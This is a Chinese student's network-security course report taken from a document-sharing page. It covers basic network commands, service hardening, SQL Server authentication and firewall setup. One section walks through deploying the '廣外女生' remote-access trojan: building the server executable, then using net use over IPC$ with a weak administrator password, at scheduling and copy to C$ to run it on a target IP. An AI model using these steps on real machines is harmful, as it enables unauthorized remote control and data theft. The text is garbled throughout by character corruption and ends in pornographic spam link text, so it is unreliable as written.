F、加強對各種訪問的審計工作,詳細記錄對網(wǎng)絡(luò)、公開服務(wù)器的訪問行為,形成完整的系統(tǒng)日志;

2、網(wǎng)絡(luò)拓撲

3、網(wǎng)絡(luò)安全的基本內(nèi)容

(1)基本網(wǎng)絡(luò)命令

A、ping命令: ping –t IP,向指定的計算機不停的發(fā)送數(shù)據(jù)包,按Ctr+Break快捷鍵可以查看統(tǒng)計信息并繼續(xù)運行,按 Ctr+C可中止運行。

B、Tracert命令:tracert IP 顯示從本地計算機到目標(biāo)服務(wù)器所經(jīng)過的計算機:

C、pathping pop.pcpop.com 除了顯示路由外,還提供325S的分析,計算丟失包的%

(2)操作系統(tǒng)安全

A、屏蔽不需要的服務(wù)組件

開始——程序——管理工具——服務(wù) 出現(xiàn)以下窗口:

然后在該對話框中選中需要屏蔽的程序,并單擊右鍵,然后選擇“停止”命令,同時將“啟動類型”設(shè)置為“手動”或“已禁用”,這樣就可以對指定的服務(wù)組進行屏蔽了。B、關(guān)閉默認(rèn)共享:“開始”——“程序”——“管理工具”——“服務(wù)”——“Server”

(3)數(shù)據(jù)庫系統(tǒng)安全

A、使用安全的帳號策略和Windows認(rèn)證模式

由于SQL Server不能更改sa用戶名稱,也不能刪除這個超級用戶,所以,我們必須對這個帳號進行最強的保護,當(dāng)然,包括使用一個非常強壯的密碼,最好不要在數(shù)據(jù)庫應(yīng)用中使用sa帳號,只有當(dāng)沒有其它方法登錄到 SQL Server 實例(例如,當(dāng)其它系統(tǒng)管理員不可用或忘記了密碼)時才使用 sa。可以新建立一個擁有與sa一樣權(quán)限的超級用戶來管理數(shù)據(jù)庫。安全的帳號策略還包括不要讓管理員權(quán)限的帳號泛濫。

SQL Server的認(rèn)證模式有Windows身份認(rèn)證和混合身份認(rèn)證兩種。在任何可能的時候,應(yīng)該對指向SQL Server的連接要求Windows身份驗證模式。

Windows認(rèn)證模式比混合模式更優(yōu)越,原因在以下:

1)它通過限制對Microsoft Windows用戶和域用戶帳戶的連接,保護SQL Server免受大部分Internet工具的侵害。

2)服務(wù)器將從Windows安全增強機制中獲益,例如更強的身份驗證協(xié)議以及強制的密碼復(fù)雜性和過期時間。

3)使用Windows認(rèn)證,不需要將密碼存放在連接字符串中。存儲密碼是使用標(biāo)準(zhǔn)SQL Server登錄的應(yīng)用程序的主要漏洞之一。

4)Windows認(rèn)證意味著你只需要將密碼存放在一個地方。

要在SQL Server的Enterprise Manager安裝Windows身份驗證模式,步驟操作: 展開服務(wù)器組——右鍵點擊服務(wù)器——然后點擊“屬性”——在安全性選項卡的身份驗證中——點擊“僅限Windows”。(4)網(wǎng)絡(luò)防火墻工具:紅墻主機網(wǎng)絡(luò)防火墻 安裝

1.具體操作如下:

第一步: 將“愛思紅墻主機網(wǎng)絡(luò)防火墻”的安裝光盤插入驅(qū)動器,運行根目錄下的Setup文件來運行其安裝程序,進入“愛思紅墻主機網(wǎng)絡(luò)防火墻安裝”窗口;

第二步:

在“歡迎安裝愛思紅墻主機網(wǎng)絡(luò)防火墻”對話框中,單擊“下一步”按鈕;

第三步: 在“軟件許可協(xié)議”對話框,接受協(xié)議點擊“是”;

第四步: 點擊“是”按鈕,出現(xiàn)顯示您計算機的相關(guān)信息,即判斷是否可以安裝本軟件;

第五步: 單擊“下一步”按鈕,出現(xiàn)“選擇目標(biāo)位置”對話框;

第六步: 在該對話框中,單擊“瀏覽”按鈕,并在“選擇文件夾”對話框中選擇盤符作為驅(qū)動器,再指定相應(yīng)的文件夾及路徑,然后單擊“確定”按鈕;

第七步: 單擊“下一步”按鈕,出現(xiàn)“選擇安裝程序名稱”對話框,您可自定義程序名稱;

第八步: 單擊“下一步”按鈕,系統(tǒng)開始復(fù)制文件;

第九步: 進入“紅墻主機網(wǎng)絡(luò)防火墻配置”窗口,作出是否運行“紅墻應(yīng)用程序掃描系統(tǒng)”的選擇后,點擊“完成”。

相關(guān)設(shè)置:告警設(shè)置:系統(tǒng)提供了兩種情況下的告警,即需要系統(tǒng)告警和不需要系統(tǒng)告警,您可據(jù)需要選取告警設(shè)置。

點擊主界面中的“規(guī)則管理”按鈕,彈出相應(yīng)窗口,如下圖:

網(wǎng)絡(luò)監(jiān)控中心:

(5)網(wǎng)絡(luò)攻擊工具:“廣外女生”

它的基本功能有:文件管理方面有上傳,下載,刪除,改名,設(shè)置屬性,建立文件夾和運行指定文件等功能;注冊表操作方面:全面模擬WINDOWS的注冊表編輯器,讓遠程注冊表編輯工作有如在本機上操作一樣方便;屏幕控制方面:可以自定義圖片的質(zhì)量來減少傳輸?shù)臅r間,在局域網(wǎng)或高網(wǎng)速的地方還可以全屏操作對方的鼠標(biāo)及鍵盤,就像操縱自己的計算機一樣;遠程任務(wù)管理方面,可以直觀地瀏覽對方窗體,隨意殺掉對方窗體或其中的控件;其他功能還有郵件IP通知等。

主要步驟:首先運行“gwg.exe”,出現(xiàn)如圖窗口:

選中“服務(wù)端設(shè)置”,生成“GDUFS.exe”木馬:

然后將“GDUFS.exe”復(fù)制到自己的C盤中,再根據(jù)一些命令把“GDUFS.exe”復(fù)制到目標(biāo)主機的盤中,再進行運行。目標(biāo)主機的IP:191.168.12.38 具體步驟及命令:

“開始”——“運行”——“cmd”

命令:net use 191.168.12.38ipc$ 123 /user:administrator 與目標(biāo)主機之間建立聯(lián)系

命令:net time 191.168.12.38 獲取目標(biāo)主機的時間

命令:at 191.168.12.38 08:21 net share c$=c: 與目標(biāo)主機的C盤建立通道

命令:copy c:GDUFS.exe 191.168.12.38c$ 復(fù)制“GDUFS.exe”文件到目標(biāo)主機的C盤中:

命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目標(biāo)主機中什么時候運行。

三、專周小結(jié):

通過這次網(wǎng)絡(luò)安全專周,我不僅僅是學(xué)到了很多知識,更是透徹的理解到了網(wǎng)絡(luò)安全對生活已經(jīng)將來工作的意義。

網(wǎng)絡(luò)安全分為軟件網(wǎng)絡(luò)安全和硬件網(wǎng)絡(luò)安全。一般我們說的網(wǎng)絡(luò)安全就是軟件上的網(wǎng)絡(luò)安全,即局域網(wǎng),互聯(lián)網(wǎng)安全。

網(wǎng)絡(luò)安全又分為內(nèi)網(wǎng)安全和外網(wǎng)安全。在內(nèi)外網(wǎng)安全中,內(nèi)網(wǎng)安全則是重中之重。畢竟是家賊難防。據(jù)不完全統(tǒng)計,全國因為內(nèi)網(wǎng)安全的問題,至少每年算是幾億美元。所以,網(wǎng)絡(luò)安全特別重要。

至于在將來的工作中,我們也要嚴(yán)格尊市網(wǎng)絡(luò)設(shè)備管理原則和使用秩序,對設(shè)備進行統(tǒng)一管理專人負責(zé),嚴(yán)格要求自己對設(shè)備進行安全操作,保持強烈的責(zé)任感和服務(wù)意識,做好每一個細節(jié),重點做好以下幾項工作:

1,及時準(zhǔn)確判斷網(wǎng)絡(luò)故障,做好上門維護工作或及時提醒網(wǎng)絡(luò)合作商進行維護。

2,定期檢查維護各網(wǎng)絡(luò)設(shè)備的運行情況并進行維護。3,不定期對服務(wù)器進行更新和檢查。

4,遇到特殊情況,及時向領(lǐng)導(dǎo)和老師匯報,努力提高應(yīng)急處理問題和獨立處理問題的能力。

感謝老師對我們的教導(dǎo)。

下載網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報告word格式文檔
下載網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報告.doc
將本文檔下載到自己電腦,方便修改和收藏,請勿使用迅雷等下載。
點此處下載文檔

文檔為doc格式


聲明:本文內(nèi)容由互聯(lián)網(wǎng)用戶自發(fā)貢獻自行上傳,本網(wǎng)站不擁有所有權(quán),未作人工編輯處理,也不承擔(dān)相關(guān)法律責(zé)任。如果您發(fā)現(xiàn)有涉嫌版權(quán)的內(nèi)容,歡迎發(fā)送郵件至:645879355@qq.com 進行舉報,并提供相關(guān)證據(jù),工作人員會在5個工作日內(nèi)聯(lián)系你,一經(jīng)查實,本站將立刻刪除涉嫌侵權(quán)內(nèi)容。

相關(guān)范文推薦

    2011年度網(wǎng)絡(luò)與信息安全情況報告

    2011年網(wǎng)絡(luò)與信息安全檢查情況的報告 2011年,在省政府辦公廳和省工信廳的指導(dǎo)下,我局進一步加強了網(wǎng)絡(luò)信息安全制度建設(shè),不斷強化日常檢查與防護管理,配備健全了網(wǎng)絡(luò)信息安全設(shè)......

    信息調(diào)研網(wǎng)絡(luò)工作總結(jié)

    今年,信息科堅持以宣傳輿情、信息、調(diào)研和網(wǎng)絡(luò)工作為重點,本著全面、及時、準(zhǔn)確、實效的原則,切實加強宣傳調(diào)研信息與輿情信息工作,為領(lǐng)導(dǎo)科學(xué)決策提供服務(wù),為實現(xiàn)全市宣傳思想......

    信息調(diào)研網(wǎng)絡(luò)工作匯報材料

    按照商丘市委宣傳部的考核評比辦法要求,就今年的信息調(diào)研網(wǎng)絡(luò)工作作如下匯報:一信息調(diào)研工作:1、今年部領(lǐng)導(dǎo)共召開4次專題工作會議,全年共上報調(diào)查報告10篇,其中《永煤文化現(xiàn)象的......

    校園網(wǎng)絡(luò)管理與信息安全解決方案(調(diào)研報告)

    校園網(wǎng)絡(luò)管理與信息安全現(xiàn)狀 調(diào)研報告 一 概述 隨著信息化程度的提高,計算機網(wǎng)絡(luò)得到了飛速發(fā)展,校園網(wǎng)絡(luò)信息化也逐步發(fā)展起來了。而高校校園信息化建設(shè)工作的整體推進, 應(yīng)用......

    網(wǎng)絡(luò)信息安全

    網(wǎng)絡(luò)信息安全 信息安全是指為建立信息處理系統(tǒng)而采取的技術(shù)上和管理上的安全保護,以實現(xiàn)電子信息的保密性、完整性、可用性和可控性。當(dāng)今信息時代,計算機網(wǎng)絡(luò)已經(jīng)成為一種不......

    關(guān)于中國網(wǎng)絡(luò)發(fā)展的調(diào)研報告

    關(guān)于中國網(wǎng)絡(luò)發(fā)展的調(diào)研報告 序言: 互聯(lián)網(wǎng)的發(fā)展始于冷戰(zhàn)時期,在60年代末期由于美蘇之間的全球爭霸,為了預(yù)防核戰(zhàn)爭對本國通信系統(tǒng)的影響,美國開始研究如何防止核打擊。這也是互......

    網(wǎng)絡(luò)信息安全應(yīng)急演練報告(定稿)

    應(yīng)急演練報告 2013年05月12日,組織模擬應(yīng)急演練。 演練背景:突然斷電 演練情形:05月12日上午9時,突然性拉閘斷電。UPS隨即啟動, 而后發(fā)電機啟動,系統(tǒng)運行正常。斷電2小時后,終止演......

    網(wǎng)絡(luò)與信息安全檢查報告

    網(wǎng)絡(luò)與信息安全檢查報告 近日柳州市教育局發(fā)出《關(guān)于開展我市教育系統(tǒng)網(wǎng)絡(luò)與信息安全工作檢查的通知》,我校自上而下,成立了專門的網(wǎng)絡(luò)信息安全管理機構(gòu),組長由莫玉梅校長親自......

主站蜘蛛池模板: 亚洲中文字幕无码卡通动漫野外| 日韩精品人妻av一区二区三区| 激烈的性高湖波多野结衣| 亚洲精品无码久久久久av老牛| 无码中文字幕在线播放2| 在线亚洲精品国产二区图片欧美| 伊人久久综合精品无码av专区| 麻豆丰满少妇chinese| 熟女体下毛毛黑森林| 久久国内精品一区二区三区| 久久一日本道色综合久久| 色偷偷888欧美精品久久久| 免费人成小说在线观看网站| 少妇爆乳无码专区网站| 欧美日韩国产码高清综合人成| 少妇人妻偷人精品无码视频新浪| 国产亚洲精品第一综合另类| 精品黑人一区二区三区久久| 亚洲国产成人资源在线| 国产成a人亚洲精品无码樱花| 伊人久久大香线蕉综合色狠狠| 老师翘臀高潮流白浆| 日韩免费无码人妻波多野| 国产成本人片无码免费| 又粗又黑又大的吊av| 国产精品视频分类精品| 精品国产一区二区三区不卡| 亚洲欧美在线观看| 巨人精品福利官方导航| 亚洲国产av玩弄放荡人妇系列| 人人爽人人澡人人高潮| 天天躁日日躁狠狠躁性色av| 人妻.中文字幕无码| 色悠久久久久综合网伊| 亚洲欧美日韩v在线观看不卡| 国产国语熟妇视频在线观看| 久久综合九色综合网站| 亚欧美日韩香蕉在线播放视频| 肥臀熟女一区二区三区| 国产九九九九九九九a片| 精品国产一区二区av片|